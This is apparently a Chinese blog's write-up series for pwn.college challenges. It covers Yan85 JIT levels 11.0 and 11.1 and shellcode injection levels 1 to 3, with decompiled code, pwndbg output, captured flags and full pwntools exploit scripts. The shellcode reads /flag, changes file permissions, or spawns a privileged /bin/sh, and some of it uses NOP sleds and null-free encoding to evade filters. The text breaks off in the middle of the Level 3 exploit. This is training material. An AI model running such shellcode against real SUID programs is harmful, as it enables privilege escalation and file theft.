        __int64 a4,
        __int64 a5,
        __int64 a6,
        __int64 a7,
        __int64 a8)
{
  const char *v8; // rax
  __int64 v10; // [rsp+0h] [rbp-20h]

  v8 = (const char *)describe_register(a7);
  printf("[e] compiling IMM %s = %#hhx to %p\n", v8, a8, a2);
  v10 = helper_mov_imm(a1, a2, a7, a8);
  if ( a7 == 1 )
    return helper_jmp_i(a1, v10);
  return v10;
}

九个参数看着挺吓人的，实际上还好啦～

通过讲义的学习我们知道，攻击思路大致应该是将 shellcode 写到变量里面，然后利用 jmp 跳转到变量内部执行我们的 shellcode。

所以我们用到的指令应该有 imm、stm、jmp。

先来看看 jmp 指令的实现：

__int64 __fastcall emit_jmp(
        __int64 a1,
        _BYTE *a2,
        __int64 a3,
        __int64 a4,
        __int64 a5,
        __int64 a6,
        __int64 a7,
        __int64 a8)
{
  const char *v8; // rbx
  const char *v9; // rax
  _BYTE *v10; // rax

  v8 = (const char *)describe_register(a8);
  v9 = (const char *)describe_flags(a7);
  printf("[e] compiling JMP %s %s to %p\n", v9, v8, a2);
  if ( a7 )
    crash(a1, "conditional jumps not supported in JIT mode");
  *a2 = 77;
  a2[1] = -119;
  v10 = helper_combo_byte(a1, a2 + 2, 1LL, a8);
  return helper_jmp_i(a1, v10);
}

跳转条件被禁了，所以 arg1 对我们来说是没用的，需要设置为 0。那么 jmp 的格式就是 jmp * reg 了。

helper_combo_byte(a1, a2 + 2, 1LL, a8) 的作用是将 yancode 中 arg2 代表的寄存器转换为 amd64 寄存器对应的机器码。而上面的两条代码负责生成将转换后得到的寄存器的值移动到 r9 中的机器码：

*a2 = 77;
a2[1] = -119;

所以最后会生成类似这样的一条指令：

mov r9, ?

附上 helper_combo_byte 的内部实现：

_BYTE *__fastcall helper_combo_byte(__int64 a1, _BYTE *a2, __int64 a3, __int64 a4)
{
  if ( a3 == 32 && a4 == 32 )
  {
    *a2 = -46;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 64 )
  {
    *a2 = -38;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 16 )
  {
    *a2 = -30;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 8 )
  {
    *a2 = -22;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 2 )
  {
    *a2 = -6;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 1 )
  {
    *a2 = -54;
    return a2 + 1;
  }
  else if ( a3 == 32 && a4 == 4 )
  {
    *a2 = -14;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 32 )
  {
    *a2 = -45;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 64 )
  {
    *a2 = -37;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 16 )
  {
    *a2 = -29;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 8 )
  {
    *a2 = -21;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 2 )
  {
    *a2 = -5;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 1 )
  {
    *a2 = -53;
    return a2 + 1;
  }
  else if ( a3 == 64 && a4 == 4 )
  {
    *a2 = -13;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 32 )
  {
    *a2 = -44;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 64 )
  {
    *a2 = -36;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 16 )
  {
    *a2 = -28;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 8 )
  {
    *a2 = -20;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 2 )
  {
    *a2 = -4;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 1 )
  {
    *a2 = -52;
    return a2 + 1;
  }
  else if ( a3 == 16 && a4 == 4 )
  {
    *a2 = -12;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 32 )
  {
    *a2 = -43;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 64 )
  {
    *a2 = -35;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 16 )
  {
    *a2 = -27;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 8 )
  {
    *a2 = -19;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 2 )
  {
    *a2 = -3;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 1 )
  {
    *a2 = -51;
    return a2 + 1;
  }
  else if ( a3 == 8 && a4 == 4 )
  {
    *a2 = -11;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 32 )
  {
    *a2 = -41;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 64 )
  {
    *a2 = -33;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 16 )
  {
    *a2 = -25;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 8 )
  {
    *a2 = -17;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 2 )
  {
    *a2 = -1;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 1 )
  {
    *a2 = -49;
    return a2 + 1;
  }
  else if ( a3 == 2 && a4 == 4 )
  {
    *a2 = -9;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 32 )
  {
    *a2 = -47;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 64 )
  {
    *a2 = -39;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 16 )
  {
    *a2 = -31;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 8 )
  {
    *a2 = -23;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 2 )
  {
    *a2 = -7;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 1 )
  {
    *a2 = -55;
    return a2 + 1;
  }
  else if ( a3 == 1 && a4 == 4 )
  {
    *a2 = -15;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 32 )
  {
    *a2 = -42;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 64 )
  {
    *a2 = -34;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 16 )
  {
    *a2 = -26;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 8 )
  {
    *a2 = -18;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 2 )
  {
    *a2 = -2;
    return a2 + 1;
  }
  else if ( a3 == 4 && a4 == 1 )
  {
    *a2 = -50;
    return a2 + 1;
  }
  else
  {
    if ( a3 != 4 || a4 != 4 )
      crash(a1, "Unkown register combination in helper_combo_byte");
    *a2 = -10;
    return a2 + 1;
  }
}

helper_jmp_i(a1, v10) 生成的代码是：

mov r8, r9
shl r8, 3
movabs rax, 0x7fff791f5478
add r8, rax
mov r8, qword ptr [r8]
movabs rax, 0x1337000
add r8, rax
jmp r8

其内部实现如下：

__int64 __fastcall helper_jmp_i(__int64 a1, __int64 a2)
{
  *(_BYTE *)a2 = 0x4D;
  *(_BYTE *)(a2 + 1) = 0x89;
  *(_BYTE *)(a2 + 2) = 0xC8;
  *(_BYTE *)(a2 + 3) = 0x49;
  *(_BYTE *)(a2 + 4) = 0xC1;
  *(_BYTE *)(a2 + 5) = 0xE0;
  *(_BYTE *)(a2 + 6) = 3;
  *(_BYTE *)(a2 + 7) = 0x48;
  *(_BYTE *)(a2 + 8) = 0xB8;
  *(_QWORD *)(a2 + 9) = a1 + 0x2008;
  *(_BYTE *)(a2 + 17) = 0x49;
  *(_BYTE *)(a2 + 18) = 1;
  *(_BYTE *)(a2 + 19) = 0xC0;
  *(_BYTE *)(a2 + 20) = 0x4D;
  *(_BYTE *)(a2 + 21) = 0x8B;
  *(_BYTE *)(a2 + 22) = 0;
  *(_BYTE *)(a2 + 23) = 0x48;
  *(_BYTE *)(a2 + 24) = 0xB8;
  *(_QWORD *)(a2 + 25) = *(_QWORD *)(a1 + 0x2000);
  *(_BYTE *)(a2 + 33) = 0x49;
  *(_BYTE *)(a2 + 34) = 1;
  *(_BYTE *)(a2 + 35) = 0xC0;
  *(_BYTE *)(a2 + 36) = 0x41;
  *(_BYTE *)(a2 + 37) = 0xFF;
  *(_BYTE *)(a2 + 38) = 0xE0;
  return a2 + 39;
}

大致逻辑就是以 a1 + 0x2008 为基地址，reg 左移三位的值为偏移的这个位置处的 QWORD 移动到 r8，并以 *(_QWORD *)(a1 + 0x2000)，也就是 0x1337000 为基，r8 为偏移，跳转到 r8 处执行。所以我们只要控制 r8 为 shellcode 的偏移就好了。

因为有之前 Yan85 的经验，我们知道 stm 可以用于设置寄存器指向的地址的值，所以：

__int64 __fastcall emit_stm(
        __int64 a1,
        const void *a2,
        __int64 a3,
        __int64 a4,
        __int64 a5,
        __int64 a6,
        __int64 a7,
        __int64 a8)
{
  const char *v8; // rbx
  const char *v9; // rax
  __int64 r8; // rax

  v8 = (const char *)describe_register(a8);
  v9 = (const char *)describe_register(a7);
  printf("[e] compiling STM *%s = %s to %p\n", v9, v8, a2);
  r8 = helper_load_r8(a1, a2, a7);
  return helper_store_mem(a1, r8, a8);
}

r8 = helper_load_r8(a1, a2, a7); 的作用是将 arg1 寄存器的值加载到 r8 中。变量 r8 存储的是下一条指令的起始地址。

helper_store_mem(a1, r8, a8) 的作用是先将 a1 + 0x1800 的地址写入 rax，然后 r8 = r8 + rax 得到要写入的位置，最后将 arg2 寄存器的 QWORD 值写入到 [r8]。

所以 stm 实际实现了下面这些指令：

mov r8, r10
movabs rax, 0x7ffc4b50d840
add r8, rax
mov qword ptr [r8], r11

相信敏锐的你已经发现了，通过 stm 直接可以控制 jmp 的跳转偏移！

之前我们分析出编译出来的 amd64 代码在 a1 + 0x2000 处，而这里 stm 是以 a1 + 0x1800 为基址的，所以我们需要计算一下它们之间相距多少：

────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x133704d    movabs r10, 0                  R10 => 0
   0x1337057    mov    r9, 1                   R9 => 1
   0x133705e    movabs r11, 0x76               R11 => 0x76
   0x1337068    mov    r9, 2                   R9 => 2
   0x133706f    mov    r8, r10                 R8 => 0
 ► 0x1337072    movabs rax, 0x7ffc436fde60     RAX => 0x7ffc436fde60 ◂— 0
   0x133707c    add    r8, rax                 R8 => 0x7ffc436fde60 (0x0 + 0x7ffc436fde60)
   0x133707f    mov    qword ptr [r8], r11     [0x7ffc436fde60] => 0x76
   0x1337082    mov    r9, 3                   R9 => 3
   0x1337089    mov    r9, r10                 R9 => 0
   0x133708c    mov    r8, r9                  R8 => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffc436fc638 —▸ 0x604e8e832312 (main+630) ◂— mov eax, 0
01:0008│     0x7ffc436fc640 —▸ 0x7ffc436fef98 —▸ 0x7ffc436ff629 ◂— '/home/cub3y0nd/Projects/pwn.college/toddlerone-level-11-0'
02:0010│     0x7ffc436fc648 ◂— 0x100000000
03:0018│     0x7ffc436fc650 ◂— 0
04:0020│     0x7ffc436fc658 —▸ 0x13377b6 ◂— add byte ptr [rax], al
05:0028│     0x7ffc436fc660 ◂— 0x20 /* ' ' */
06:0030│     0x7ffc436fc668 ◂— 0
07:0038│     0x7ffc436fc670 ◂— 0x40 /* '@' */
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0        0x1337072
   1   0x604e8e832312 main+630
   2   0x7963bbc34e08
   3   0x7963bbc34ecc __libc_start_main+140
   4   0x604e8e8302ae _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p/x 0x2000-0x1800
$1 = 0x800
pwndbg> x/10gx 0x7ffc436fde60+0x800
0x7ffc436fe660: 0x0000000001337000 0x0000000000000046
0x7ffc436fe670: 0x0000000000000057 0x0000000000000068
0x7ffc436fe680: 0x0000000000000082 0x00000000000000b3
0x7ffc436fe690: 0x00000000000000c4 0x00000000000000d5
0x7ffc436fe6a0: 0x00000000000000e6 0x00000000000000ed

所以，只要控制偏移为 0x808 处的值为 shellcode 的偏移即可。

那我们的 yancode 就可以设计为：

imm a, 0x808
imm b, shellcode_offset
stm a, b
imm a, 0
jmp * a
imm a, shellcode
imm a, shellcode
imm a, shellcode
...

因为 shellcode 用一个变量肯定存不下，所以我们需要把各个部分分开写到多个变量中，之间通过 jmp 来实现连续的控制流。

小小 JIT 不过如此嘛～

至此，既然攻击链都出来了，那这个虚拟机还剩下的一些细枝末节我就懒得分析了，直接开写 exp。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-11-0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *main+628
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def construct_payload():
    """
    arg1, arg2, opcode

    /* chmod(file='f', mode=4) */
    /* push b'f\x00' */
    push 0x66
    mov rdi, rsp
    push 4
    pop rsi
    /* call chmod() */
    push 90 /* 0x5a */
    pop rax
    syscall
    """

    yancode = p64(0x20) + p64(0x808) + p64(0x40)  # imm a, 0x808
    yancode += p64(0x40) + p64(0xCD) + p64(0x40)  # imm b, 0xcd
    yancode += p64(0x20) + p64(0x40) + p64(0x10)  # stm a, b
    yancode += p64(0x20) + p64(0x00) + p64(0x40)  # imm a, 0x00
    yancode += p64(0x00) + p64(0x20) + p64(0x08)  # jmp *, a
    yancode += (
        p64(0x20) + asm("push 0x66; mov rdi, rsp; nop; jmp $+0xb") + p64(0x40)
    )  # imm a, shellcode
    yancode += (
        p64(0x20) + asm("push 0x4; pop rsi; push 0x5a; nop; jmp $+0xb") + p64(0x40)
    )  # imm a, shellcode
    yancode += (
        p64(0x20) + asm("pop rax; syscall") + asm("nop") * 0x5 + p64(0x40)
    )  # imm a, shellcode

    return yancode


def attack(target, payload):
    try:
        target.sendafter(b"Please input your yancode: ", payload)
        target.recvall(timeout=3)

        try:
            with open("./f", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{MCXoFb-q4KUhm1mE_Yk7XCDiZZa.0VOzMDL5cTNxgzW}

Level 11.1

Information

Category: Pwn

Description

The ultimate Yan85 challenge. Provide your own Yan85 shellcode. Now updated for modern hardware!

Write-up

参见 Level 11.0。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-11-1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *main+503
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def construct_payload():
    """
    opcode arg1, arg2

    /* chmod(file='f', mode=4) */
    /* push b'f\x00' */
    push 0x66
    mov rdi, rsp
    push 4
    pop rsi
    /* call chmod() */
    push 90 /* 0x5a */
    pop rax
    syscall
    """

    yancode = p64(0x10) + p64(0x08) + p64(0x808)  # imm a, 0x808
    yancode += p64(0x10) + p64(0x02) + p64(0xCD)  # imm b, 0xcd
    yancode += p64(0x02) + p64(0x08) + p64(0x02)  # stm a, b
    yancode += p64(0x10) + p64(0x08) + p64(0x00)  # imm a, 0x00
    yancode += p64(0x08) + p64(0x00) + p64(0x08)  # jmp *, a
    yancode += (
        p64(0x10) + p64(0x08) + asm("push 0x66; mov rdi, rsp; nop; jmp $+0xb")
    )  # imm a, shellcode
    yancode += (
        p64(0x10) + p64(0x08) + asm("push 0x4; pop rsi; push 0x5a; nop; jmp $+0xb")
    )  # imm a, shellcode
    yancode += (
        p64(0x10) + p64(0x08) + asm("pop rax; syscall") + asm("nop") * 0x5
    )  # imm a, shellcode

    return yancode


def attack(target, payload):
    try:
        target.sendafter(b"Please input your yancode: ", payload)

        try:
            with open("./f", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Ya3vfImP22Fzv4tZpHMBD5iDj_H.0FM0MDL5cTNxgzW}

后记

又是打了十八天，终于可以开启我心心念念朝思暮想曾多次想放弃却从未开启的下一章了 LMAO

Write-ups: Program Security (Shellcode Injection) series (Completed)

Tue, 24 Dec 2024 00:00:00 GMT

Level 1

Information

Category: Pwn

Description

Write and execute shellcode to read the flag!

Write-up

pwndbg> checksec
File:     /home/cub3y0nd/Projects/pwn.college/babyshell-level-1
Arch:     amd64
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX unknown - GNU_STACK missing
PIE:        PIE enabled
Stack:      Executable
RWX:        Has RWX segments
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-1024h]
  const char **i; // [rsp+30h] [rbp-1020h]
  const char **j; // [rsp+38h] [rbp-1018h]
  _BYTE v10[16]; // [rsp+40h] [rbp-1010h] BYREF
  unsigned __int64 v11; // [rsp+1048h] [rbp-8h]

  v11 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  puts(
    "In this challenge, shellcode will be copied onto the stack and executed. Since the stack location is randomized on every");
  puts("execution, your shellcode will need to be *position-independent*.\n");
  shellcode = v10;
  printf("Allocated 0x1000 bytes for shellcode on the stack at %p!\n", v10);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-1.c", 0x69u, "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_2565);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

够简单的吧，stack rwx，((void (*)(void))shellcode)(); 把 buf 的地址强制转换为函数指针，执行我们的输入内容。

Exploit

由于是 SUID 程序，以程序所有者权限运行。所以我们的思路是通过 sendfile(0x1, open("/flag", 0x0, 0x0), 0x0, 0x1000) 直接输出 /flag 的内容：

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = asm(
        """
    mov rax, 0x67616c662f
    push rax
    lea rdi, [rsp]
    mov rsi, 0x0
    mov rdx, 0x0
    mov rax, 0x2
    syscall

    mov rdi, 0x1
    mov rsi, rax
    mov rdx, 0x0
    mov rcx, 0x1000
    mov rax, 0x28
    syscall

    mov rdi, 0x0
    mov rax, 0x3c
    syscall
        """
    )

    return shellcode


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

还可以用 pwntools 的 shellcraft 来完成：

def construct_payload():
    shellcode = shellcraft.cat("/flag")

    return asm(shellcode)

如果要 shell 的话可以这样写，-p 参数确保使用真实 uid、gid 启动 /bin/sh：

def construct_payload():
    shellcode = shellcraft.execve("/bin/sh", ["/bin/sh", "-p"], 0)

    return asm(shellcode)

Flag

Flag: pwn.college{s4taPKpK1SzfB3gWK--PDuB4Xwx.01NxIDL5cTNxgzW}

Level 2

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but a portion of your input is randomly skipped.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  unsigned int v5; // eax
  int fd; // [rsp+28h] [rbp-1028h]
  int v9; // [rsp+2Ch] [rbp-1024h]
  const char **i; // [rsp+30h] [rbp-1020h]
  const char **j; // [rsp+38h] [rbp-1018h]
  _BYTE v12[16]; // [rsp+40h] [rbp-1010h] BYREF
  unsigned __int64 v13; // [rsp+1048h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  puts(
    "In this challenge, shellcode will be copied onto the stack and executed. Since the stack location is randomized on every");
  puts("execution, your shellcode will need to be *position-independent*.\n");
  shellcode = v12;
  printf("Allocated 0x1000 bytes for shellcode on the stack at %p!\n", v12);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-2.c", 0x69u, "main");
  puts("Executing filter...\n");
  puts(
    "This challenge will randomly skip up to 0x800 bytes in your shellcode. You better adapt to that! One way to evade this");
  puts(
    "is to have your shellcode start with a long set of single-byte instructions that do nothing, such as `nop`, before the");
  puts(
    "actual functionality of your code begins. When control flow hits any of these instructions, they will all harmlessly");
  puts("execute and then your real shellcode will run. This concept is called a `nop sled`.\n");
  v5 = time(0LL);
  srand(v5);
  v9 = rand() % 1792 + 256;
  shellcode = (char *)shellcode + v9;
  shellcode_size -= v9;
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_2735);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

这题在上一题的基础之上加了一个简单的限制：随机生成一个 [0, 2048) 之内的随机数，将 shellcode 地址设置为 buf 起始地址加上这个随机数。所以我们要避免把实际攻击代码放在 [0, 2048) 这个地址区间内，通过 nop sled 滑过这块区间就可以轻松绕过～

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-2"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = asm(
        """
    .rept 0x7ff
        nop
    .endr

    mov rax, 0x67616c662f
    push rax
    lea rdi, [rsp]
    mov rsi, 0x0
    mov rdx, 0x0
    mov rax, 0x2
    syscall

    mov rdi, 0x1
    mov rsi, rax
    mov rdx, 0x0
    mov rcx, 0x1000
    mov rax, 0x28
    syscall

    mov rdi, 0x0
    mov rax, 0x3c
    syscall
        """
    )

    return shellcode


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

def construct_payload(sled_length):
    shellcode = shellcraft.nop() * sled_length
    shellcode += shellcraft.cat("/flag")

    return asm(shellcode)

Flag

Flag: pwn.college{ws9aMHkG9tAyi31HLrmkc2LoE35.0FOxIDL5cTNxgzW}

Level 3

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-18h]
  int k; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2CE31000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)753078272 )
    __assert_fail("shellcode == (void *)0x2ce31000", "/challenge/babyshell-level-3.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2CE31000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-3.c", 0x67u, "main");
  puts("Executing filter...\n");
  puts("This challenge requires that your shellcode have no NULL bytes!\n");
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    if ( !*((_BYTE *)shellcode + k) )
    {
      printf("Failed filter at byte %d!\n", k);
      exit(1);
    }
  }
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_251D);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

这次的限制是 shellcode 的机器指令中不允许出现 \x00 字节。这就需要我们好好利用各种指令组合来构造数据了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-3"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = asm(
        """
    mov rdi, 0x67616c66
    shl rdi, 0x8
    or rdi, 0x2f
    push rdi
    lea rdi, [rsp]
    xor rsi, rsi
    xor rdx, rdx
    xor rax, rax
    or rax, 0x2
    syscall

    xor rdi, rdi
    or rdi, 0x1
    mov rsi, rax
    xor rdx, rdx
    xor r10, r10
